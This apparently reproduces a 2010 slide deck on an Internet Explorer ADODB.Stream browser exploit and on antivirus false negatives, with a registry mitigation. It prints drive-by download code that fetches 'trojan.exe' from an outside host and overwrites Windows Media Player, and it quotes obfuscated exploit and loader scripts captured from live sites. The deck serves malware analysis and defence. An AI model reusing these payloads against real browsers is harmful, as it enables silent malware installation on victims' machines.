22
Shasta Console Operations February 2010 Tony Caleb

Shasta Console Operations

  • Upload
    debra

  • View
    57

  • Download
    1

Embed Size (px)

DESCRIPTION

Shasta Console Operations. February 2010 Tony Caleb. Agenda. MSIE ADODB. Stream Object Installation Weakness. AV/IS FN Detection. Dynamic Analysis. Introduction. - PowerPoint PPT Presentation

Citation preview

Page 1: Shasta Console Operations

Shasta Console Operations

February 2010Tony Caleb

Page 2: Shasta Console Operations

Agenda

Dynamic Analysis

AV/IS FN Detection

MSIE ADODB. Stream Object Installation Weakness

Page 3: Shasta Console Operations

Introduction

MSIE ADODB.Stream Object Installation Weakness is the BROWSER EXPLOIT, that allows the hackers to attack a system through browser, install it’s activex controls and takes over the victims system.

This attack could pose a serious security threat. You should take immediate action to stop any damage or prevent further damage from happening. - SYMANTEC

ADODB.stream provides a method for reading and writing files on a hard drive. This by-design functionality is sometimes used by web applications. However, when combined with known security vulnerabilities in Microsoft Internet Explorer, it could allow an internet web site to execute script from the Local Machine Zone (LMZ). This occurs because the ADODB.Stream object allows access to the hard drive when hosted within Internet Explorer. - MICROSOFT

This weakness depends on scripting that abuses the ADODB.Stream Object to write an attacker-specified file to the victim file system. – SECURITY FOCUS

Page 4: Shasta Console Operations

How does it occurs?

Microsoft Internet Explorer is prone to a security weakness that may permit malicious HTML documents to create or overwrite files on a victim file system when interpreted from the Local Zone (or other Security Zones with relaxed security restrictions, such as the Intranet Zone).

Page 5: Shasta Console Operations

What it does in infected machine?

This weakness depends on scripting that abuses the ADODB.Stream Object to write an attacker-specified file to the victim file system. In this manner, an HTML document that is interpreted in the context of a Security Zone with relaxed security restrictions may install a malicious file on the victim file system.

The stream object contains several methods for reading and writing binary files and text files. When this by-design functionality is combined with known security vulnerabilities in Microsoft Internet Explorer, an Internet Web site could execute script from the Local Machine zone. This behavior occurs because the ADODB.Stream object permits access to the hard disk when the ADODB.Stream object is hosted in Internet Explorer

The error that displays on the page when the script is been executed ( It makes the user think that just a error has occurred so that the page is not loaded but the malicious content is been downloaded in his system without his knowledge)

error.jsp is a jsp page that consists of one line, namely<% response.setStatus(HttpServletResponse.SC_UNAUTHORIZED); %>(Just to send a false header in IE)

Page 6: Shasta Console Operations

Sample Code

const adTypeBinary = 1const adSaveCreateOverwrite = 2const adModeReadWrite = 3

set xmlHTTP = CreateObject("Microsoft.XMLHTTP")xmlHTTP.open "GET","http://ip3e83566f.speed.planet.nl/NOTEPAD.EXE",falsexmlHTTP.sendcontents = xmlHTTP.responseBody

Set oStr = CreateObject("ADODB.Stream")oStr.Mode = adModeReadWriteoStr.Type = adTypeBinaryoStr.Open

oStr.Write(contents)oStr.SaveToFile "c:\\test.exe", adSaveCreateOverwrite

</script> 

How a file is been downloaded into a victims system

Page 7: Shasta Console Operations

Sample Code

var x = new ActiveXObject("Microsoft.XMLHTTP");x.Open("GET", "http://attacker/trojan.exe",0);x.Send();

var s = new ActiveXObject("ADODB.Stream");s.Mode = 3;s.Type = 1;s.Open();s.Write(x.responseBody);

s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);location.href = "mms://";

How this exploit can be made in vmplayer

Page 8: Shasta Console Operations

Modification of vmplayer.exe

<script language="javascript“>function preparecode(code) {result = '';lines = code.split(/\r\n/);for (i=0;i<lines.length;i++) {line = lines[i];if (line != '') {result += line +'\\r\\n';}}return result;}function doit() {mycode = preparecode(document.all.code.value);myURL = "file:javascript:eval('" + mycode + "')";window.open(myURL,"_media")}window.open("error.jsp","_media");setTimeout("doit()", 5000);</script>

Code for the modification of Windows Media Player

Page 9: Shasta Console Operations

How to Overcome This Issue

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{00000566-0000-0010-8000-00AA006D2EA4}

Changing the keys in the Registry

Disabling of ActiveX controls

Disabling of any kind of ActiveX controls in the IE security. So that it does not allow anything to download by itself( Anyhow in the older versions of the Internet Explorer it is not possible).

Page 10: Shasta Console Operations

Changing the keys in the Registry

1. Close any open Internet Explorer browser windows.2. Click Start, and then click Run.3. In the Open box, type Regedit, and then click OK.4. In Registry Editor, locate the following registry key:5. “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility”6. Right-click ActiveX Compatibility, point to New, and then click Key.7. Type the following name for the key:8. {00000566-0000-0010-8000-00AA006D2EA4}9. Close Registry Editor.

Page 11: Shasta Console Operations

Samples of FN Detection

MSIE Event Object Mem Corruption Code Exec

HTTP MSIE Style Tag Cmt Mem Corruption

The domain “khan.co.kr” with URL http://gallery.khan.co.kr/ is found to have the above threat but during the manual analysis of this URL NIS does not detect it. Here the hackers have bypassed the AV/IS.

This is a common FN that we find in with IS.Here a script that redirects to malicious links will be given in the encoded format and since the redirect link is not active NIS but it will change dynamically.This clearly proves that the malicious content is intentionally done since the script tag is present after the close html tag.

Trojan.Malscript.B

The domain Voy.com with the URL http://www.voy.com//76583 is found to have the above threat but during the manual analysis of this URL and the AV/IS fail to detect.

Page 12: Shasta Console Operations

MSIE Event Object Mem Corruption Code Exec

Page 13: Shasta Console Operations

MSIE Event Object Mem Corruption Code Exec

Page 14: Shasta Console Operations

MSIE Event Object Mem Corruption Code Exec

Code in the index2.html

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('g a=1b;g 2="%u";g1B="%2E%w%2t%c%2w"+2+"b";g 10="%P%34%h%39"+2+"6";g 1l="%C%B%A%h%36";g 1C="%2Y%2Q%2P%2T%1P%1W";g s=a("%1O%1L"+2+"6%M%1H%1F%K%1E%1K"+2+"6%1a%1N%2m%2a%S%4b"+2+"b%4a");s+=a("%q%N%y%49"+2+"6%41%f%k%4w"+2+"6%4r%q%N%y%4s"+2+"6%3s%f%k");s+=a("%3w"+2+"6%3V%q%N%y%1y"+2+"6%3E%f%k%3I"+2+"6%3H%1s%17%3G%M%16");s+=a("%19%1e%r%k%4c"+2+"6%R%1s%17%3J%M%16%19%3A%r%k%3B"+2+"6%R");s+=a("%3C%3D"+2+"6%1a%3L%3S%3T%3U%3R%3Q%3M%3N%3O%3P%3z%3y%3i%3j%3k"+"F"+"0"+"5");s+=a("%3l%3h%3g%3c%3d%3e"+2+"6%3f%X%3m%1c%J%L%3n%15%3u");s+=a("%L%3v%1c%J%L%3t%15%3o%3p%W%P%3q%f%3r%14%1e%q");s+=a("%k%3X"+2+"6%Q%4t%4u%4v%4q%4m%4n%4o%4p%X%4x%4E%4F%4G");s+=a("%4D%4C%W%12%1z%4y%4z%4A%4B%4l%4k%44%1z%46%47%43%42");s+=a("%3Y%3Z"+2+"6%40%14%P"+10+"%4g"+2+"6%4h%4i"+2+"6%4j");s+=a("%4f"+2+"b%m%4e"+2+"6%12%11%11%l%3b%4d%4H%2U%27%28%29%u"+"4"+"1"+"9"+"0");s+=a("%26%25%21%22%23%24%2b"+2+"b%c%2c"+2+"b%2j%2k%2l%1y%2i"+2+"b");s+=a("%18%1f%1r%2h"+2+"6%h%2d"+2+"6%l%1q%1t%1u%1x%2e"+2+"6%1w%

Page 15: Shasta Console Operations

MSIE Event Object Mem Corruption Code Exec

Code in the index2.html

1v");s+=a("%S%2f"+2+"6%20"+2+"6%K%S%1V"+2+"b%1G%1J%1f%1r%1M"+2+"6%h%1I");s+=a(""+2+"6%l%1q%1t%1u%1x%1Z"+2+"6%1w%1v%1X%1Y%1U%1T%R%1Q"+2+"b");s+=a("%1R%1S%2g%Q%3a%2o%2V%2W%2X"+2+"6%l%Q%2S%2O%U%2R%2Z");s+=a("%37%38"+2+"6%35%30%31%32%33%2N%2M%r%K%2x%y%2y"+2+"6%l");s+=a("%2z%2v%1d%w%J%2u%2q%2p%2r%2s"+2+"6%l%z%2A%2B%f"+2+"6");s+=a("%2I%2J"+2+"6%2K%2L%2H%1n%w%1k%2G%v%1j%2C%r%1g%2D"+2+"b");s+=a("%1h"+2+"b%1i%d%2F%45%5k%76"+1l+""+2+"b%h%75"+2+"6");s+=a("%4I%v%m%E"+2+"b%z%I%78%79%U%74%73%C%B%A%h%6Z");s+=a(""+2+"b%h%6Y"+2+"6%70%v%m%E"+2+"b%z%I%71%72%U%7b%7j%C");s+=a("%B%A%h%7m"+2+"b%h%7i"+2+"6%7h%v%m%E"+2+"b%z%I%7g%6X");s+=a("%6W%1n%w%1k%6E%6D%1j%6F%f%1g%6G"+2+"b%1h"+2+"b%1i%6H%c");s+=a("%6C"+2+"6%6B%6x%6w%6y%f%e%d%c%6z"+2+"6%6A%6I%6J%6S%f");s+=a("%e%d%c%6R"+2+"6%6T%6U%6V%6Q%f%e%d%c%6P"+2+"6%6L%6K");s+=a("%6M%7o%f%e%d%c%6N"+2+"6%6O%7n%7x%86%f%e%d%c%7R");s+=a(""+2+"b%7Q%87%7W%7X%f%e%d%c%7Y"+2+"6%7Z%7V%7U%7P%f%e");s+=a("%d%c%7S"+2+"6%7T%80%81%88%f%e%d%c%82"+2+"b%83%84%85");s+=a("%7N%f%e%d%c%7w"+2+"b%7O%7y%Z%7z%f%e%d%c%7v"+2+"6");s+=a("%7u%7q%7p%7r"+2+"6%e%d%c%7s"+2+"6%7t%7A%7B%7J"+2+"6%e%

Page 16: Shasta Console Operations

HTTP MSIE Style Tag Cmt Mem Corruption

The /* is closed after the end of style tag that is after 80,000 lines of garbage stuff.Due to insertion of these unwanted stuff, the memory stack is overflow and as a result the entire browser crashes.

<!-- google_ad_section_start --><style type=text/css>body{background-repeat:repeat;background-color:black;background-image:none;color:black;visibility:hidden;font-size:10000;line-height:10000;letter-spacing:10000;text-decoration:blink;text-align:right;margin-top:10000;}form{visibility:hidden;}table{visibility:hidden;}a{visibility:hidden;}img{visibility:hidden;}input{visibility:hidden;}</style><A rel=nofollow target=_blank HREF=https:???????????????????????????????????????????? > <style>@; /*<<BR>

URL : hxxp://www.voy.com//76583/

Page 17: Shasta Console Operations

Manual Analysis

How we do the manual analysis

Tools we use for manual analysis

Samples

Page 18: Shasta Console Operations

Tools Used for Manual Analysis

HTTP Analyzer

TCP Viewer

Process Explorer

Systracer (System Tracer)

Start up programs ( msconfig,services.msc)

Page 19: Shasta Console Operations

HTTP Malicious Toolkit Variant Activity

From URL:

<script language=JavaScript> function bfbn15(p){ var h=p.length,k=1024,s,i,c,z=0,d=0,j=0,t=Array(63,31,62,3,50,13,56,52,26,53,0,0,0,0,0,0,30,58,61,15,25,14,41,59,1,51,47,10,54,29,24,57,43,49,42,34,19,55,38,28,32,20,40,0,0,0,0,46,0,17,48,18,44,36,22,5,7,35,11,37,2,27,0,8,39,23,6,33,45,16,21,9,60,4,12);for(i=Math.ceil(h/k);i>0;i--){c='';for(s=Math.min(h,k);s>0;s--,h--){{j|=(t[p.charCodeAt(z++)-48])<<d;if(d){c+=String.fromCharCode(129^j&255);j>>=8;d-=2}else{d=6}}}eval(c);}}bfbn15('Li2GkG_BJK1BXqCB4IPFgG2GemR_kG_67IEOJq0PLCCA9T@RVLjApCC6dT@ZJ3EGeIm_pC2OXj@Z4CJ6xE8A9q1xGARPV3@Be1PAJS2GpG_P9GRJVRKIXq1AJEJG70@OF4z69p2PI32GkGEGFSARUfm_QSRRVVGOi1E6SmRRVE8ZLi@O9pEJbVmdsVEOZm@A9IPdUrRx9i1GeIGZki_xQUE66JGG_0EOi2mJ_S2OI3EGe0PFZl') </script>

After Decoding

< script language = JavaScript > function bfbn15(p)bfbn15('Li2GkG_BJK1BXqCB4IPFgG2GemR_kG_67IEOJq0PLCCA9T@RVLjApCC6dT@ZJ3EGeIm_pC2OXj@Z4CJ6xE8A9q1xGARPV3@Be1PAJS2GpG_P9GRJVRKIXq1AJEJG70@OF4z69p2PI32GkGEGFSARUfm_QSRRVVGOi1E6SmRRVE8ZLi@O9pEJbVmdsVEOZm@A9IPdUrRx9i1GeIGZki_xQUE66JGG_0EOi2mJ_S2OI3EGe0PFZl') </script>

Page 20: Shasta Console Operations

HTTP Malicious Toolkit Variant Activity

Page 21: Shasta Console Operations

HTTP Malicious Toolkit Variant Activity

Page 22: Shasta Console Operations

Thank You